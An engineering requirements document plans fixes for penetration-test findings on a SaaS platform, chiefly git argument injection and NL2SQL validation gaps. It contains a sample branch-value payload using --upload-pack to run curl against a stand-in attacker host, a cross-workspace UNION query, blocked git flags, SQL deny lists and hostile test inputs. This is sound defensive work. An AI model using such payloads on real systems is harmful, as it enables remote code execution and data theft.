PRD-70: Security Hardening — Pen Test Remediation

Version: 1.0
Status: Draft — CRITICAL PRIORITY
Priority: P0
Author: Gar Kavanagh + Auto CTO
Created: 2026-03-03
Updated: 2026-03-03
Dependencies: PRD-44 (Security Hardening Architecture — 12 of 45 stories complete), PRD-18 (Credential Management — COMPLETE), PRD-61 (NL2SQL V2 — COMPLETE)
Source: Shannon AI Penetration Test Report (2026-03-03), 4.4 hours, $90.83, 12 phases completed
Branch: fix/pentest-remediation-70

Executive Summary

On 2026-03-03, the Shannon AI penetration testing framework completed a full-scope assessment of https://ui.automatos.app covering authentication, authorization, XSS, SQL/command injection, and SSRF. Shannon was unable to breach the external perimeter — zero vulnerabilities were exploited from an unauthenticated position. Clerk auth, the waitlist system, and Next.js framework protections held.

However, Shannon identified 8 injection vulnerabilities and 21 authorization concerns through code analysis that become exploitable once an attacker has a valid account. Since Automatos is a SaaS platform where every paid user gets an authenticated session, "requires authentication" is not a mitigating factor — it's the baseline.

Independent Verification Results

I independently verified every Shannon finding against the actual codebase. Shannon's analysis was partially based on PRD documentation rather than live code (they acknowledged this limitation). Here's what changed after verification:

| Shannon Finding | Shannon Severity | Verified Severity | Notes |
|---|---|---|---|
| 7 command injection (git clone) | CRITICAL | CRITICAL — Confirmed | 3 distinct code paths, all missing -- separator, branch params unvalidated |
| 1 SQL injection (NL2SQL) | CRITICAL | MEDIUM — Downgraded | PRD-61 fix catches mutations in subqueries. Real risk is UNION cross-workspace reads |
| Auto-admin @automatos.app | CRITICAL | LOW — Downgraded | Backend removed this (clerk.py:196). Frontend-only — doesn't grant backend access |
| Frontend-only admin auth | CRITICAL | FALSE POSITIVE | Backend has _assert_admin() on every admin endpoint |
| 21 IDOR / authz issues | HIGH (21 items) | LOW — Downgraded | Backend consistently filters by workspace_id on all CRUD operations |
| 4 SSRF via git clone | HIGH | CRITICAL — Same as cmd injection | Same root cause as command injection findings |
| JWT audience validation | MEDIUM | MEDIUM — Confirmed | Configuration check needed |
| Generated images proxy SSRF | MEDIUM | FALSE POSITIVE — Confirmed | Next.js framework protection blocks exploitation |

Bottom line: Shannon overcounted by basing findings on PRD docs instead of actual code. The real attack surface is smaller but the git clone vulnerabilities are genuinely critical. This PRD fixes everything that actually matters.

What's Actually Critical

Git argument injection — 3 live code paths allow RCE via --upload-pack flag injection. Authenticated users can execute arbitrary commands on the backend server.
Missing -- separator — No git subprocess call uses -- to delimit options from positional arguments, so any argument that starts with - is parsed as an option instead of a URL.
NL2SQL cross-workspace reads — The validator prevents mutations but doesn't enforce workspace isolation in SELECT queries. UNION-based cross-workspace data exfiltration is possible.
Database SSL not enforced — Connection strings lack sslmode=require.
Frontend auto-admin remnant — role-context.tsx:44-48 still grants admin UI to @automatos.app emails even though the backend ignores it.

1. Findings Detail

1.1 CRITICAL: Git Argument Injection (3 Code Paths + 1 Script)

All paths share the same root cause: user-controlled branch parameters are passed to git subprocess calls without validation, and no -- separator is used.

Path A: Skills Import (`skill_loader.py`) — HIGHEST RISK

Frontend (import-git-modal.tsx:49)
→ API (POST /api/v1/skills/sources/git)    ← NO ADMIN CHECK
→ skill_loader.py:283 — validate_git_url(git_url) ← VALIDATES DOMAIN ONLY
→ skill_loader.py:312 — self._git_clone(git_url, local_path, branch)
→ skill_loader.py:560-566:
    cmd = ["git", "clone", "--depth", "50", "--branch", branch, git_url, local_path]
    subprocess.run(cmd, timeout=300, capture_output=True, text=True)

Critical discovery: The skills import endpoint at api/skills.py:183 has NO admin check. ANY authenticated user can import git repos. Skills auto-activate immediately with no approval workflow (unlike plugins which require admin approval + security scan).

What's validated: validate_git_url() at line 96 checks the URL hostname against an allowlist (github.com, gitlab.com, bitbucket.org). This blocks arbitrary URLs but does NOT prevent branch parameter injection.

What's NOT validated:

branch parameter — no validation at all. --upload-pack='bash -c "curl attacker.com"' as branch value gives RCE.
No -- separator before positional git_url argument

Contrast with Plugins: The plugin import path (POST /api/admin/plugins/import-github) correctly requires _assert_admin() at line 507 of admin_plugins.py, runs a full security scan (static + LLM), and requires admin approval. Skills bypass all of this.

Decision: Lock skills import to admin-only for now. Future: build a safe user-facing import flow with full security scan + marketplace approval, matching the plugin pipeline.

Path B: CodeGraph Indexing (`codegraph_service.py`) — KEEP BUT SECURE

Frontend (api-client.ts:1442-1454)
→ API (POST /api/code-graph/index/github)    ← NO ADMIN CHECK
→ codegraph_service.py:460:
    Repo.clone_from(clone_url, temp_dir, branch=branch, depth=1)

What's validated: Nothing. The IndexGitHubRequest Pydantic model accepts any string as github_url — no URL parsing, no domain check, no protocol check.

What works well:

Workspace scoping is enforced at DB level — all codegraph tables filter by workspace_id
Clones into tempfile.mkdtemp() — cleaned up on success and failure
Duplicate prevention — won't re-index if status is already "indexing"

What needs fixing:

Add URL validation (HTTPS only, github.com/gitlab.com/bitbucket.org only — this IS a code indexing tool)
Add branch validation (no leading -)
GitPython's Repo.clone_from() passes branch to git CLI — same injection risk
Auth token injected into URL at line 452 — if exception leaks the URL, token is exposed
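
The token-leak item above can be addressed by redacting credentials before a URL reaches a log line or an exception message. The following is a minimal sketch, not the codegraph service's actual code: `redact_url_credentials` and `safe_error_message` are hypothetical helper names, and the example assumes the token is embedded as URL userinfo (`https://user:token@host/...`).

```python
from urllib.parse import urlsplit, urlunsplit


def redact_url_credentials(url: str) -> str:
    """Return the URL with any userinfo (user:token@) replaced by a placeholder."""
    parts = urlsplit(url)
    if parts.username is None and parts.password is None:
        return url  # nothing to hide
    host = parts.hostname or ""
    if parts.port is not None:
        host = f"{host}:{parts.port}"
    return urlunsplit((parts.scheme, f"***@{host}", parts.path, parts.query, parts.fragment))


def safe_error_message(exc: Exception, clone_url: str) -> str:
    """Build a log-safe message: the raw clone URL is swapped for its redacted form."""
    return str(exc).replace(clone_url, redact_url_credentials(clone_url))
```

A caller would wrap the clone in `try/except` and log `safe_error_message(exc, clone_url)` rather than the raw exception text.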

Path C: Workspace GitHub Clone (`workspace_github.py`) — BEST ISOLATED

Frontend (workspace github UI)
→ API (POST /api/workspaces/{workspace_id}/github/clone)
→ workspace_github.py:217-223:
    step = {"action": "git_clone", "repo": clone_url, "branch": body.branch}
→ Redis queue → workspace-worker container → executor.py:365-402
→ Files land at /workspaces/{workspace_id}/repos/{repo_name}

Already well-secured:

CloneRequest Pydantic model has @field_validator("repo_url") — validates HTTPS only, allowed hosts (github.com, gitlab.com, bitbucket.org), strips embedded credentials
Runs in separate workspace-worker container (not the backend server)
Per-workspace filesystem isolation (/workspaces/{workspace_id}/)
Backend has read-only mount; worker has read-write
Command whitelist blocks sudo, su, mount, etc.
Path traversal prevention via resolve_safe_path()
5GB quota per workspace
Workspace access verified at line 180

What still needs fixing:

branch parameter has no validation — same leading - injection risk
Worker's git clone command doesn't use -- separator
These are lower severity because the worker container has limited blast radius vs. the backend server

Path D: Plugin Harvest Script (`harvest_plugins.py`)

harvest_plugins.py:152:
    subprocess.run(["git", "clone", "--depth", "1", url, str(dest)])

Lower risk: Standalone script, not an API endpoint. URLs come from hardcoded CURATED_REPOS list. Plugins go through PluginUploadService with full security scan. Fix for completeness.

1.2 MEDIUM: NL2SQL Validator Gaps

Shannon's claim: "Regex validator fails to detect nested subqueries with mutations."

Actual state: The validator at modules/nl2sql/query/validator.py:203-210 was fixed in PRD-61 (US-009). It strips string literals, then checks DENY_KEYWORDS (\bINSERT\b, \bUPDATE\b, \bDELETE\b, etc.) across the ENTIRE SQL including subqueries. Nested INSERT INTO ... RETURNING * WOULD be caught because \bINSERT\b matches the keyword even inside a subquery.

What IS still vulnerable:

UNION cross-workspace reads — SELECT * FROM users WHERE workspace_id = 'mine' UNION SELECT * FROM users WHERE workspace_id = 'theirs'. No mutations, passes all keyword checks. The table allowlist helps (lines 214-223 validate tables against schema metadata), but if the NL2SQL data source includes shared tables like users or workspace_members, cross-workspace reads are possible.
RETURNING not in deny list — INSERT, UPDATE, and DELETE are denied, but RETURNING itself is not, so blocking a data-returning write depends entirely on the mutation keywords matching.
Regex fundamentally can't parse SQL — Edge cases will always exist. AST-based parsing is the correct approach.

Real severity: MEDIUM (not CRITICAL). The mutation protection works. The residual risk is cross-workspace SELECTs.
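
To make the gap concrete, here is a simplified sketch of a keyword-based check in the style described above. It is not the code in validator.py: the deny list is a four-keyword subset, and `strip_string_literals` and `violates_deny_list` are illustrative names. It shows a nested mutation being caught while the UNION read passes.

```python
import re

# Subset of the deny list quoted in this PRD (FIX-04 lists the full set).
DENY_KEYWORDS = [r"\bINSERT\b", r"\bUPDATE\b", r"\bDELETE\b", r"\bDROP\b"]


def strip_string_literals(sql: str) -> str:
    """Replace single-quoted literals with '' so keywords inside strings are ignored."""
    return re.sub(r"'(?:[^']|'')*'", "''", sql)


def violates_deny_list(sql: str) -> bool:
    """True if any denied keyword appears anywhere in the literal-stripped SQL."""
    clean = strip_string_literals(sql)
    return any(re.search(pattern, clean, flags=re.IGNORECASE) for pattern in DENY_KEYWORDS)


nested_mutation = "SELECT * FROM (INSERT INTO t VALUES (1) RETURNING *) AS x"
union_read = (
    "SELECT * FROM users WHERE workspace_id = 'mine' "
    "UNION SELECT * FROM users WHERE workspace_id = 'theirs'"
)

print(violates_deny_list(nested_mutation))  # True: INSERT matches inside the subquery
print(violates_deny_list(union_read))       # False: no denied keyword is present
```

The second result is the residual risk: a read-only query is valid by keyword rules even when it crosses workspace boundaries.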

1.3 LOW: Frontend Auto-Admin Remnant

// frontend/contexts/role-context.tsx:44-48
// Auto-admin for @automatos.app domain
// Anyone with an @automatos.app email is automatically an admin
const primaryEmail = session.user.primaryEmailAddress?.emailAddress
if (primaryEmail?.endsWith('@automatos.app')) {
    roleFromToken = 'admin'
}

Backend status: Removed. orchestrator/core/auth/clerk.py:196 has the comment: "Domain-based auto-admin was removed for security (see PRD-43 US-025)."

Impact: Frontend shows admin UI to @automatos.app users, but all admin API calls go through _assert_admin() which checks system_role from the Clerk JWT, not email domain. An attacker registering with @automatos.app email gets admin UI but every admin API call returns 403.

Still should be fixed: The frontend check should be removed to prevent confusion and to align with the principle that security decisions should never happen in the frontend.

1.4 FALSE POSITIVES (Shannon Overcounts)

21 IDOR / authorization issues: Backend verification confirms comprehensive workspace filtering:

agents.py:611 — Agent.workspace_id == ctx.workspace_id
documents.py:501 — Document.workspace_id == ctx.workspace_id
workflows.py:387 — Workflow.workspace_id == ctx.workspace_id
channels.py — parameterized workspace_id in raw SQL
Admin endpoints — _assert_admin() on every handler
Chat endpoints — user_id ownership checks

Shannon could not test these from an unauthenticated position and classified them based on PRD documentation rather than actual code review. The backend implementation is sound.

Frontend-only admin auth: Backend admin_plugins.py and admin_prompts.py both implement _assert_admin() — a function that checks ctx.user.system_role in ("admin", "super_admin") on every request. This is not frontend-only.
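
For readers unfamiliar with the pattern, a server-side role gate of this kind might look like the sketch below. It is an illustration only: the real _assert_admin() body is not reproduced in this PRD, and `RequestContext`, `User`, and `ForbiddenError` are hypothetical stand-ins for the framework's request context and its 403 response.

```python
from dataclasses import dataclass

ADMIN_ROLES = ("admin", "super_admin")


class ForbiddenError(Exception):
    """Hypothetical stand-in for the HTTP 403 a real handler would return."""


@dataclass
class User:
    system_role: str


@dataclass
class RequestContext:
    user: User


def assert_admin(ctx: RequestContext) -> None:
    """Reject the request unless the server-side role is an admin role.

    The email domain is never consulted; only system_role decides.
    """
    if ctx.user.system_role not in ADMIN_ROLES:
        raise ForbiddenError("admin role required")
```

Because the decision uses only server-side state, a frontend that shows admin UI to the wrong user still cannot reach admin data.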

1.5 MEDIUM: Infrastructure Gaps (From Data Security Audit)

| Gap | Current State | Risk |
|---|---|---|
| Database SSL | No sslmode in DATABASE_URL | Data in transit unencrypted between backend and Postgres |
| Redis TLS | No TLS configured | Cached data (sessions, rate limits) unencrypted |
| Redis dangerous commands | FLUSHDB, FLUSHALL, CONFIG available | If Redis exposed, full data wipe possible |
| Audit service | Stub file (199 bytes, no implementation) | No audit trail for security-sensitive operations |
| JWT audience validation | Optional — may not be configured | Cross-Clerk-app JWT reuse if CLERK_AUDIENCE unset |

2. Remediation Plan

Phase 1: Critical Fixes (Week 1) — Stop the Bleeding

These fixes prevent RCE on the backend server. Ship immediately.

FIX-01: Secure Git Operations (ALL code paths)

Create: orchestrator/core/security/git_sanitizer.py

"""
Centralized git URL and branch validation.
All git subprocess calls MUST use these functions.
"""

import re
from urllib.parse import urlparse
from typing import Tuple, Optional, List

ALLOWED_GIT_DOMAINS = [
    "github.com",
    "gitlab.com",
    "bitbucket.org",
]

# Git arguments that enable command execution
DANGEROUS_GIT_FLAGS = [
    "--upload-pack",
    "--receive-pack",
    "-c",
    "--config",
    "--exec-path",
    "--template",
]

BRANCH_PATTERN = re.compile(r"^[a-zA-Z0-9][a-zA-Z0-9._/\-]*$")

def validate_git_url(url: str, allowed_domains: List[str] | None = None) -> Tuple[bool, Optional[str]]:
    """Validate git URL: HTTPS only, domain allowlist, no argument injection."""
    domains = allowed_domains or ALLOWED_GIT_DOMAINS

    if url.startswith("-"):
        return False, "URL must not start with a dash"

    try:
        parsed = urlparse(url)
    except Exception:
        return False, "Invalid URL format"

    if parsed.scheme not in ("https",):
        return False, f"Only HTTPS URLs are allowed (got: {parsed.scheme or 'none'})"

    hostname = (parsed.hostname or "").lower()
    if not any(hostname == d or hostname.endswith("." + d) for d in domains):
        return False, f"Domain not in allowlist: {hostname}"

    return True, None

def validate_branch(branch: str) -> Tuple[bool, Optional[str]]:
    """Validate branch name: alphanumeric + . / _ - only, no leading dash."""
    if not branch:
        return False, "Branch name is required"
    if branch.startswith("-"):
        return False, "Branch name must not start with a dash"
    if not BRANCH_PATTERN.match(branch):
        return False, "Branch contains invalid characters"
    if len(branch) > 255:
        return False, "Branch name too long"
    return True, None

def build_git_clone_cmd(
    url: str,
    target_dir: str,
    branch: str = "main",
    depth: int = 50,
) -> list[str]:
    """Build a safe git clone command with -- separator."""
    cmd = ["git", "clone", "--depth", str(depth)]
    if branch:
        cmd.extend(["--branch", branch])
    cmd.append("--")  # End of options — everything after is positional
    cmd.extend([url, target_dir])
    return cmd
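
BRANCH_PATTERN blocks the injection characters but still accepts some names that git itself rejects under its ref-name rules, such as `a..b`, `feature//x`, or `main.lock`. These are not an injection vector, but rejecting them up front gives a clean validation error instead of a failed clone. The sketch below is an optional extra layer; `violates_ref_format` and `is_strict_branch` are hypothetical names, not part of git_sanitizer.py.

```python
import re

# Copied from git_sanitizer.py above so this block runs on its own.
BRANCH_PATTERN = re.compile(r"^[a-zA-Z0-9][a-zA-Z0-9._/\-]*$")


def violates_ref_format(branch: str) -> bool:
    """True if a name that passes BRANCH_PATTERN still breaks git's ref-name rules."""
    if ".." in branch or "//" in branch:
        return True
    if branch.endswith("/") or branch.endswith("."):
        return True
    # No path component may start with a dot or end with ".lock".
    return any(
        part.startswith(".") or part.endswith(".lock")
        for part in branch.split("/")
    )


def is_strict_branch(branch: str) -> bool:
    """Combine the character allowlist, the length cap, and the ref-format checks."""
    return (
        bool(BRANCH_PATTERN.match(branch))
        and len(branch) <= 255
        and not violates_ref_format(branch)
    )
```

If adopted, the extra checks could be folded into validate_branch() so callers still have a single entry point.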

Modify files:

| File | Change | Priority |
|---|---|---|
| api/skills.py | Add _assert_admin(ctx) check to import_git_repository() at line 183. Skills import is admin-only until a safe user-facing flow is built. | |
| modules/agents/services/skill_loader.py | Replace inline validate_git_url with import from git_sanitizer. Add validate_branch() call before _git_clone(). Use build_git_clone_cmd() in _git_clone(). | |
| modules/codegraph/codegraph_service.py | Add validate_git_url() + validate_branch() before Repo.clone_from(). Validate URL is HTTPS + allowed domain (this is a code indexing tool — only git hosts make sense). | |
| api/workspace_github.py | Add validate_branch() before building task step. URL already validated by Pydantic model. | |
| services/workspace-worker/executor.py | Add -- separator to git clone command in _git_clone() handler (line ~380). Add validate_branch(). | |
| scripts/harvest_plugins.py | Add validate_git_url() before clone_repo(). Use build_git_clone_cmd(). | |

Key principles:

Every git URL is validated: HTTPS only, domain allowlist, no leading -
Every branch name is validated: alphanumeric + ./_-, no leading -
Every subprocess.run git call uses -- separator before positional args
One module, one import — no per-file reimplementation
Skills import locked to admin-only (matches plugin import pattern)

FIX-02: Remove Frontend Auto-Admin

Modify: frontend/contexts/role-context.tsx

Delete the @automatos.app domain check (cited in section 1.3 as role-context.tsx:44-48), including the closing brace of the if block. Admin role should come exclusively from Clerk publicMetadata.role.

FIX-03: Enforce JWT Audience Validation

Modify: orchestrator/core/auth/clerk.py

Ensure CLERK_AUDIENCE is set and validated. Add a startup check:

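# In config.py
CLERK_AUDIENCE: str = os.getenv("CLERK_AUDIENCE", "")
if not CLERK_AUDIENCE:
    # Startup check: refuse to boot without an audience to validate against
    raise RuntimeError("CLERK_AUDIENCE must be set")

# In clerk.py, inside verify_token()
# Always validate that the aud claim matches config.CLERK_AUDIENCE
...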

Add to deployment checklist: CLERK_AUDIENCE must be set in all environments.
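
The audience comparison itself is small. The sketch below assumes the token has already been signature-verified and decoded into a claims mapping; `audience_matches` and `require_audience_configured` are hypothetical helpers, not functions in clerk.py. Per RFC 7519 the `aud` claim may be either a single string or a list of strings, so both shapes are handled.

```python
from typing import Any, Mapping


def require_audience_configured(value: str) -> str:
    """Startup guard: fail fast when the expected audience is missing or blank."""
    cleaned = value.strip()
    if not cleaned:
        raise RuntimeError("CLERK_AUDIENCE must be set")
    return cleaned


def audience_matches(claims: Mapping[str, Any], expected: str) -> bool:
    """Check the aud claim of an already-verified token against the expected value."""
    if not expected:
        return False  # never treat "no expectation" as a match
    aud = claims.get("aud")
    if isinstance(aud, str):
        return aud == expected
    if isinstance(aud, (list, tuple)):
        return expected in aud
    return False  # missing or malformed aud claim
```

A token with no `aud` claim is rejected here, which is the strict reading of "enforce"; whether existing Clerk tokens carry the claim should be confirmed before rollout.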

Phase 2: Defense in Depth (Week 2) — Harden the Perimeter

FIX-04: NL2SQL Query Hardening

Modify: orchestrator/modules/nl2sql/query/validator.py

Add RETURNING to deny list:

DENY_KEYWORDS = [
    r"\bINSERT\b", r"\bUPDATE\b", r"\bDELETE\b", r"\bALTER\b",
    r"\bTRUNCATE\b", r"\bDROP\b", r"\bCREATE\b", r"\bMERGE\b",
    r"\bGRANT\b", r"\bREVOKE\b", r"\bVACUUM\b",
    r"\bRETURNING\b",  # NEW: Prevents mutation disguised as SELECT
    r"\bCOPY\b",       # NEW: Prevents COPY TO/FROM
    r"\bEXECUTE\b",    # NEW: Prevents dynamic SQL
]

Enforce workspace isolation at SQL level:

def _inject_workspace_filter(self, sql: str, workspace_id: str) -> str:
    """Ensure all queries are workspace-scoped."""
    # For each table reference, verify a workspace_id filter exists
    # If not, inject WHERE workspace_id = :workspace_id
    ...

Add CTE detection:

if re.search(r"\bWITH\b", clean_sql, flags=re.IGNORECASE):
    raise SQLValidationError("CTEs (WITH clauses) are not allowed")

Future: Replace regex with AST parsing (Phase 3). Use sqlglot or pglast to parse SQL into an AST and validate the tree structure rather than string patterns.

FIX-05: Database Connection Security

Modify: orchestrator/config.py and docker-compose.yml

Add sslmode=require to DATABASE_URL:

DATABASE_URL = os.getenv("DATABASE_URL", "").rstrip()
if DATABASE_URL and "sslmode" not in DATABASE_URL:
    DATABASE_URL += "?sslmode=require" if "?" not in DATABASE_URL else "&sslmode=require"
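
The substring test above treats any occurrence of "sslmode" in the URL, including one inside a password, as proof that the parameter is set. A slightly more robust variant parses the query string instead. This is a sketch under that assumption; `ensure_sslmode` is a hypothetical helper name.

```python
from urllib.parse import parse_qsl, urlsplit, urlunsplit


def ensure_sslmode(database_url: str, mode: str = "require") -> str:
    """Add sslmode=<mode> unless the URL already has an sslmode query parameter."""
    url = database_url.strip()
    if not url:
        return url
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    if any(key == "sslmode" for key, _ in params):
        return url  # an explicit setting is left untouched
    # Append to the raw query string so existing parameters are not re-encoded.
    query = f"{parts.query}&sslmode={mode}" if parts.query else f"sslmode={mode}"
    return urlunsplit(parts._replace(query=query))
```

Note that an existing weaker value such as sslmode=disable is preserved by this sketch; production config may prefer to reject it outright.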

Disable Redis dangerous commands in docker-compose.yml:

redis:
  command: >
    redis-server
    --requirepass ${REDIS_PASSWORD:?required}
    --maxmemory 256mb
    --maxmemory-policy allkeys-lru
    --rename-command FLUSHDB ""
    --rename-command FLUSHALL ""
    --rename-command CONFIG ""
    --rename-command DEBUG ""

Note: CONFIG rename breaks Redis introspection tools. Only apply in production. Use an environment-conditional redis.conf if needed.

FIX-06: Audit Service Implementation

Modify: orchestrator/core/services/audit_service.py

The audit service is currently a 199-byte stub. Implement actual audit logging for security-sensitive operations:

AUDITED_EVENTS = [
    "git_clone",              # Any git clone operation
    "admin_access",           # Admin endpoint access
    "workspace_role_change",  # Role modifications
    "credential_access",      # Credential resolution
    "nl2sql_query",           # Database queries via NL2SQL
    "plugin_import",          # Plugin imports
    "skill_import",           # Skill imports
    "api_key_create",         # API key generation
]

Write to the audit_logs table (already defined in schema). Include: timestamp, user_id, workspace_id, event_type, resource_id, ip_address, user_agent, result (success/failure), and metadata JSON.
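
One possible shape for the record, using the fields listed above, is sketched here. The `AuditRecord` class and its `to_row` method are illustrative names; the actual audit_logs column types are not shown in this PRD, so the row is a plain dict with metadata serialized to JSON text.

```python
import json
from dataclasses import asdict, dataclass, field
from datetime import datetime, timezone
from typing import Any, Optional

AUDITED_EVENTS = frozenset({
    "git_clone", "admin_access", "workspace_role_change", "credential_access",
    "nl2sql_query", "plugin_import", "skill_import", "api_key_create",
})


@dataclass(frozen=True)
class AuditRecord:
    event_type: str
    user_id: str
    workspace_id: str
    result: str  # "success" or "failure"
    resource_id: Optional[str] = None
    ip_address: Optional[str] = None
    user_agent: Optional[str] = None
    metadata: dict[str, Any] = field(default_factory=dict)
    timestamp: str = field(
        default_factory=lambda: datetime.now(timezone.utc).isoformat()
    )

    def __post_init__(self) -> None:
        # Reject typos early so unknown events never reach the table.
        if self.event_type not in AUDITED_EVENTS:
            raise ValueError(f"unknown audit event: {self.event_type}")
        if self.result not in ("success", "failure"):
            raise ValueError(f"invalid result: {self.result}")

    def to_row(self) -> dict[str, Any]:
        """Flatten to a dict suitable for an INSERT, with metadata as JSON text."""
        row = asdict(self)
        row["metadata"] = json.dumps(row["metadata"], sort_keys=True)
        return row
```

Recording failures as well as successes matters here: a rejected `--upload-pack` branch value is exactly the event an investigator would want to find.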

Phase 3: Proactive Security (Weeks 3-4)

FIX-07: Rate Limiting per Workspace

Modify: Rate limiting configuration

Current: 60 req/min per IP (global). Add per-workspace rate limiting for sensitive operations:

| Operation | Rate Limit |
|---|---|
| Git clone (any path) | 5/hour per workspace |
| NL2SQL query | 30/min per workspace |
| Admin operations | 20/min per user |
| Plugin/skill import | 3/hour per workspace |
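
The limits above can be expressed as a sliding-window counter keyed by operation and scope. The sketch below keeps state in process memory purely for illustration; with multiple backend workers the counters would need to live in shared storage such as Redis. The operation keys and the `SlidingWindowLimiter` class are hypothetical names.

```python
import time
from collections import defaultdict, deque
from typing import Callable, Deque, Dict, Tuple

# (max calls, window in seconds), taken from the table above.
LIMITS: Dict[str, Tuple[int, int]] = {
    "git_clone": (5, 3600),
    "nl2sql_query": (30, 60),
    "admin_operation": (20, 60),
    "plugin_skill_import": (3, 3600),
}


class SlidingWindowLimiter:
    def __init__(self, clock: Callable[[], float] = time.monotonic) -> None:
        self._clock = clock  # injectable so tests can control time
        self._hits: Dict[Tuple[str, str], Deque[float]] = defaultdict(deque)

    def allow(self, operation: str, scope_id: str) -> bool:
        """Record a call and return True, or return False if the limit is reached."""
        max_calls, window = LIMITS[operation]
        now = self._clock()
        hits = self._hits[(operation, scope_id)]
        # Drop timestamps that have aged out of the window.
        while hits and now - hits[0] >= window:
            hits.popleft()
        if len(hits) >= max_calls:
            return False
        hits.append(now)
        return True
```

Here `scope_id` is the workspace ID for workspace-scoped limits and the user ID for admin operations.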

FIX-08: CSP and Security Headers

Modify: frontend/middleware.ts or Next.js config

Verify and enforce:

Content-Security-Policy — restrict script sources, prevent inline scripts
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy — disable unused browser features

FIX-09: Dependency Audit

Run pip-audit and npm audit / yarn audit to identify known CVEs in dependencies. Fix or pin affected packages.

FIX-10: Scheduled Shannon Re-Test

After all fixes are deployed, re-run Shannon with authenticated test credentials to:

Verify all injection paths are blocked
Test IDOR/authz with actual authenticated sessions
Validate workspace isolation under adversarial conditions

3. File Impact Table

New Files

| File | Fix | Description |
|---|---|---|
| orchestrator/core/security/__init__.py | FIX-01 | Security utilities package |
| orchestrator/core/security/git_sanitizer.py | FIX-01 | Centralized git URL/branch validation |
| orchestrator/tests/security/test_git_sanitizer.py | FIX-01 | Unit tests for git sanitizer |
| orchestrator/tests/security/test_nl2sql_validator.py | FIX-04 | Adversarial SQL injection test cases |

Modified Files

| File | Fix | Change |
|---|---|---|
| orchestrator/api/skills.py | FIX-01 | Add _assert_admin() to skills git import endpoint — admin-only until safe user flow exists |
| orchestrator/modules/agents/services/skill_loader.py | FIX-01 | Replace inline validation with git_sanitizer imports; add -- separator; add branch validation |
| orchestrator/modules/codegraph/codegraph_service.py | FIX-01 | Add URL/branch validation before Repo.clone_from(); HTTPS + domain allowlist |
| orchestrator/api/workspace_github.py | FIX-01 | Add branch validation before task submission (URL already validated by Pydantic) |
| services/workspace-worker/executor.py | FIX-01 | Add -- separator + branch validation in _git_clone() handler |
| orchestrator/scripts/harvest_plugins.py | FIX-01 | Add URL validation; use build_git_clone_cmd() |
| frontend/contexts/role-context.tsx | FIX-02 | Remove @automatos.app auto-admin logic |
| orchestrator/core/auth/clerk.py | FIX-03 | Enforce CLERK_AUDIENCE validation |
| orchestrator/config.py | FIX-03, FIX-05 | Add CLERK_AUDIENCE config; add sslmode to DATABASE_URL |
| orchestrator/modules/nl2sql/query/validator.py | FIX-04 | Add RETURNING/COPY/EXECUTE to deny list; add CTE detection; add workspace filter injection |
| docker-compose.yml | FIX-05 | Disable Redis dangerous commands |
| orchestrator/core/services/audit_service.py | FIX-06 | Implement actual audit logging (replace stub) |

4. Test Plan

Unit Tests (FIX-01: Git Sanitizer)

# test_git_sanitizer.py

# URL validation
def test_rejects_non_https(): ...              # "http://github.com/x/y" → False
def test_rejects_file_protocol(): ...          # "file:///etc/passwd" → False
def test_rejects_unknown_domain(): ...         # "https://evil.com/x/y" → False
def test_rejects_leading_dash(): ...           # "--upload-pack=evil https://github.com/x/y" → False
def test_accepts_github_https(): ...           # "https://github.com/x/y" → True
def test_accepts_gitlab_https(): ...           # "https://gitlab.com/x/y" → True
def test_rejects_no_protocol(): ...            # "github.com/x/y" → False

# Branch validation
def test_rejects_upload_pack_as_branch(): ...  # "--upload-pack=evil" → False
def test_rejects_config_as_branch(): ...       # "-c protocol.ext.allow=always" → False
def test_rejects_leading_dash_branch(): ...    # "-malicious" → False
def test_accepts_normal_branch(): ...          # "main", "feat/my-feature", "v1.0.0" → True
def test_accepts_slashes(): ...                # "feature/auth/oauth" → True

# Command building
def test_cmd_has_double_dash(): ...            # "--" appears before URL
def test_cmd_url_after_double_dash(): ...      # URL is positional, not flag
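
A few of the stubs above could be filled in as follows. To keep the block runnable on its own it carries a compact copy of validate_branch() and build_git_clone_cmd() from FIX-01; in the repository the tests would presumably import them from the git_sanitizer module instead (that import path is an assumption based on the file table).

```python
import re
from typing import Optional, Tuple

# Compact copy of the FIX-01 helpers so this block runs standalone.
BRANCH_PATTERN = re.compile(r"^[a-zA-Z0-9][a-zA-Z0-9._/\-]*$")


def validate_branch(branch: str) -> Tuple[bool, Optional[str]]:
    if not branch:
        return False, "Branch name is required"
    if branch.startswith("-"):
        return False, "Branch name must not start with a dash"
    if not BRANCH_PATTERN.match(branch):
        return False, "Branch contains invalid characters"
    if len(branch) > 255:
        return False, "Branch name too long"
    return True, None


def build_git_clone_cmd(url: str, target_dir: str, branch: str = "main", depth: int = 50) -> list:
    cmd = ["git", "clone", "--depth", str(depth)]
    if branch:
        cmd.extend(["--branch", branch])
    cmd.append("--")  # end of options
    cmd.extend([url, target_dir])
    return cmd


def test_rejects_upload_pack_as_branch():
    ok, err = validate_branch("--upload-pack=evil")
    assert not ok and err == "Branch name must not start with a dash"


def test_rejects_config_as_branch():
    ok, _ = validate_branch("-c protocol.ext.allow=always")
    assert not ok


def test_accepts_normal_branch():
    for name in ("main", "feat/my-feature", "v1.0.0"):
        assert validate_branch(name) == (True, None)


def test_cmd_has_double_dash():
    url = "https://github.com/x/y"
    cmd = build_git_clone_cmd(url, "/tmp/dest")
    assert cmd.index("--") < cmd.index(url)


def test_cmd_url_after_double_dash():
    url = "https://github.com/x/y"
    cmd = build_git_clone_cmd(url, "/tmp/dest")
    assert cmd[-3:] == ["--", url, "/tmp/dest"]
```

The functions follow pytest naming, so the file can be collected by pytest without further setup.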

Unit Tests (FIX-04: NL2SQL Hardening)

# test_nl2sql_validator.py

# Mutation detection (existing + new)
def test_rejects_insert_in_subquery(): ...     # "SELECT * FROM (INSERT INTO...)" → rejected
def test_rejects_returning_clause(): ...       # "... RETURNING *" → rejected
def test_rejects_cte_with_mutation(): ...      # "WITH x AS (DELETE FROM...)" → rejected
def test_rejects_copy_to(): ...                # "COPY ... TO ..." → rejected

# Cross-workspace (new)
def test_rejects_union_without_workspace(): ...  # UNION accessing other workspace data
def test_injects_workspace_filter(): ...         # Workspace filter added when missing

Integration Tests

| Test | Validates |
|---|---|
| Submit skills import with --upload-pack as branch | Returns 400, not 500 or RCE |
| Submit codegraph index with file:///etc/passwd as URL | Returns 400 |
| Submit workspace clone with internal IP as URL | Returns 400 |
| Admin endpoint without admin role | Returns 403 (backend enforced) |
| NL2SQL with UNION cross-workspace query | Returns validation error |

Regression Test (Post-Deploy)
